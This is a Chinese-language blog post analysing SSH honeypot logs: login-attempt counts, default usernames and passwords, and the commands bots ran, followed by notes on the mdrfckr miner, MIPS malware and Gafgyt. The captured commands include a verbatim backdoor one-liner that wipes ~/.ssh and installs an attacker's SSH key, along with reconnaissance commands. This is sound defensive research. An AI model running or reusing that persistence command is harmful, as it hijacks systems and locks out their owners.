# 什么是蜜罐?
当攻击者试图侵入系统时,蜜罐会检测并记录攻击。
我们将在这里讨论的蜜罐是 SSH 蜜罐。
#环境
OS: Ubuntu 24.04 LTS x86_64
Kernel: 6.8.0-31-generic#登录尝试
cat X.log | grep -c "login attempt"
11599总共进行了 11,599 次登录尝试。除以 30 天,这意味着平均每天有 386 次登录尝试。
#已使用用户名
cat X.log | grep -a "login attempt" | awk '{print $5}' | awk -F "'" '{print $2}' | sort | uniq -c | sort -nr | head
8181 root
977 345gs5662d34
359 admin
198 pi
105 0
71 ubuntu
51 ubnt
46 support
37 user
30 oracle正如预期的那样,许多攻击都针对习惯和默认用户名。
对于345gs5662d34用户来说,根据丹麦奥尔堡大学的研究,这可能是Polycom CX600 IP 电话的默认凭证
这里查看SweetCam:一个 IP 摄像头蜜罐
https://vbn.aau.dk/ws/portalfiles/portal/573748244/sweetcam_honeypot_paper_1_.pdf
#密码
cat X.log | grep -a "login attempt" | awk '{print $5}' | awk -F "'" '{print $4}' | sort | uniq -c | sort -nr | head
977 345gs5662d34
967 3245gs5662d34
246 admin
239 123456
208 password
155 0
88 root
75 raspberry
73 123
66 raspberryraspberry993311再次,与Polycom CX600 IP 电话的默认用户名相同
登录后执行的命令
cat X.log | grep -a "CMD" | awk -F'CMD: ' '{print $2}' | sort | uniq -c | sort -nr
6775 echo -e "\x6F\x6B"
1016 cd ~; chattr -ia .ssh; lockr -ia .ssh
1016 cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
320 uname -s -v -n -r -m
112 ./oinasf; dd if=/proc/self/exe bs=22 count=1 || while read i; do echo $i; done < /proc/self/exe || cat /proc/self/exe;
87 uname -a
29 ps | grep '[Mm]iner'
29 ps -ef | grep '[Mm]iner'
29 ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*
29 ifconfig
29 echo Hi | cat -n
29 cat /proc/cpuinfo
29 /ip cloud print
23 whoami
23 which ls
23 w
23 uname -m
23 uname
23 top
23 lscpu | grep Model
23 ls -lh $(which ls)
23 free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
23 df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
23 crontab -l
23 cat /proc/cpuinfo | grep name | wc -l
23 cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
23 cat /proc/cpuinfo | grep model | grep name | wc -l
・・・现在有趣的部分开始了
oinasf 脚本
执行神秘脚本,./oinasf然后尝试读取和显示系统的可执行内容,表明了一种探测漏洞或有价值信息的策略。
其使用/ip cloud print表明机器人以 MikroTik 路由器为目标来访问或破坏基于云的服务,同时为uname -s -m它们提供有关操作系统和机器架构的重要详细信息,这些信息对于根据系统的具体情况制定进一步的行动非常有价值。
总之,这些命令代表了渗透、评估和建立对目标系统的控制的明确策略。
他们强调机器人对直接操纵和持续访问的偏好,强调了对这种常见但具有潜在破坏性的策略进行强有力防御的迫切需要。
mdrfckr 加密货币矿工
该矿工只需创建一个 cron 作业,删除.ssh文件夹中的所有内容并添加一个 ssh 密钥并锁定其他用户。
此后,如果存在其他矿工并且只剩下空地,它就会将其杀死。
你可以查看这个已经被黑客入侵并且该矿工已在他的服务器上使用的 repo:安装在我的系统上的加密矿工的转储 - Github
MIPS 恶意软件
可能是另一个MIPS(无互锁流水线阶段的多处理器)架构恶意软件,针对路由器和物联网设备。
以下是对 MIPS 恶意软件行为的良好解读和分析:
分析 MIPS 平台的后门/机器人
Sakura.sh 脚本
该脚本是Gafgyt 恶意软件的一部分。
Gafgyt又名BASHLITE,是一种影响物联网 (IoT) 设备和基于 Linux 的系统的僵尸网络。该恶意软件旨在入侵并控制这些设备,通常通过利用弱密码或默认密码以及已知漏洞。Gafgyt 自 2014 年以来一直存在,并已演变为多个变体,每个变体都有自己的一套功能和能力,包括发起分布式拒绝服务 (DDoS) 攻击的能力
感谢您抽出
.
.
来阅读本文
点它,分享点赞在看都在这里
